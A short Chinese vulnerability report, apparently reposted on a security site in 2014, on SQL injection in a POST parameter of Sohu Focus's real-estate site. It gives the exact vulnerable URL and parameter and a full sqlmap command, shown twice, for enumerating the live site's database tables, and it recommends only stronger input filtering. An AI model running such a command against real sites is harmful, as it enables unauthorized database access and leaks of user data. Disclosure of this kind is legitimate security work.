搜狐焦点房产 主站SQL注射 可致数据库信息泄露下载

来源:黑吧安全网 浏览:694次 时间:2014-06-12
做网站找雨过天晴工作室

搜狐焦点房产主站SQL注入漏洞可致数据库信息泄露SQLMAP验证

漏洞位置:

(POST)http://house.focus.cn/housemarket/loushu/more.php

imageField5=&q_loushu_name=bgkeqnpf

参数q_loushu_name过滤不严引发注射



 

C:\Users\Administrator>sqlmap.py -u "http://house.focus.cn/housemarket/loushu/more.php" --data="imageField5=&q_loushu_name=bgkeqnpf" -p q_loushu_name --level 5 --tables



注意用的是level 5


后来访问过快ip被ban了,就不继续了

C:\Users\Administrator>sqlmap.py -u "http://house.focus.cn/housemarket/loushu/more.php" --data="imageField5=&q_loushu_name=bgkeqnpf" -p q_loushu_name --level 5 --tables



注意用的是level 5

 

修复方案:

加强参数过滤